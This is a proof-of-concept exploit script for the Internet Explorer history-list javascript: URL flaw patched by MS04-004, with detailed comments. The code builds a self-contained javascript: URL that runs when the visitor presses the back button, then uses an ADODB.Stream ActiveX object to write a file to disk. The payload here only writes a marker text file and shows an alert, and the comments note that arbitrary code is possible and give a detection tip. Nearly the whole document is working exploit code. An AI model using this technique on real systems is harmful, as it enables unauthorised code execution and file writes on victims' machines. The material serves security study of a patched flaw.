Internet Explorer url javascript injection in history list (MS04-004)

    
 
// Andreas Sandblad, 2004-02-03, patched by MS04-004

                              // Name:     payload
                              // Purpose:  Proof-of-concept payload. Per the original author it is run
                              //           from the Local Machine zone, where the code could be arbitrary
                              //           (e.g. executing shell commands). This demo only writes a
                              //           harmless marker text file and shows an alert.
                              // Steps:    Creates an ADODB.Stream ActiveX object, opens it, sets
                              //           Type=2 (adTypeText) with an "ascii" charset, writes the marker
                              //           string, then calls SaveToFile(file, 2), where 2 is
                              //           adSaveCreateOverWrite, so an existing file of that name is
                              //           replaced.
                              // Notes:    - `file` and `o` are assigned without `var`, so they become
                              //             implicit globals of whatever context evaluates this code.
                              //           - The file name is a relative path; the "desktop" location in
                              //             the alert text is the author's claim and depends on the
                              //             current directory of the process -- TODO confirm.
                              //           - backbutton() embeds this function's source text in a
                              //             javascript: URL, so comments are kept outside the body to
                              //             leave that text unchanged.
                              // Defence:  The issue is patched by MS04-004 (see header). Web-delivered
                              //           script that instantiates ADODB.Stream and then calls
                              //           SaveToFile is a file-write primitive and a useful detection
                              //           signal in content inspection.
                              function payload() {
                              file = "sandblad.txt";
                              o = new ActiveXObject("ADODB.Stream");
                              o.Open();
                              o.Type=2;
                              o.Charset="ascii";
                              o.WriteText("You are vulnerable!");
                              o.SaveToFile(file, 2);
                              o.Close();
                              alert("File "+file+" created on desktop!");
                              }

                              // Name:     trigger
                              // Purpose:  Gate for the payload. It is called from the javascript: URL
                              //           that backbutton() builds, and decides on each evaluation
                              //           whether payload() should run.
                              // Param:    len - the value of history.length captured by backbutton()
                              //           when the URL was built.
                              // Returns:  "-" while history.length still equals len (the first
                              //           evaluation); undefined after payload() has been called.
                              // Notes:    - A differing history.length is taken to mean the URL is
                              //             being re-evaluated from the history list, i.e. the user
                              //             pressed the back button (per the original comment).
                              //           - Returning a string from a javascript: URL presumably makes
                              //             the browser render "-" as a new document, which is what
                              //             gives the user something to navigate back from -- browser
                              //             behaviour, not shown in this file.
                              //           - backbutton() embeds this function's source text in the URL,
                              //             so comments are kept outside the body.
                              function trigger(len) {
                              if (history.length != len)
                              payload();
                              else
                              return "-";
                              }

                              // Name:    backbutton
                              // Purpose: Navigate the window to a javascript: URL that carries the
                              //          source text of trigger() and payload() followed by a call
                              //          trigger(<history.length at build time>).
                              // Notes:   Concatenating a function object with a string coerces it to
                              //          its source text, so the URL is self-contained. Per the page
                              //          header, a script URL placed in the history list this way is
                              //          the behaviour patched by MS04-004.
                              function backbutton() {
                                  // Snapshot the history depth; trigger() compares against it later.
                                  var depthAtLaunch = history.length;
                                  var scriptUrl = 'javascript:' + trigger + payload +
                                                  'trigger(' + depthAtLaunch + ')';
                                  location = scriptUrl;
                              }

                              // Entry point, evaluated on page load: the demo runs only after the
                              // visitor explicitly accepts the confirmation dialog.
                              if (confirm("Press OK to run backbutton exploit!")) {
                                  backbutton();
                              }
                              
                              
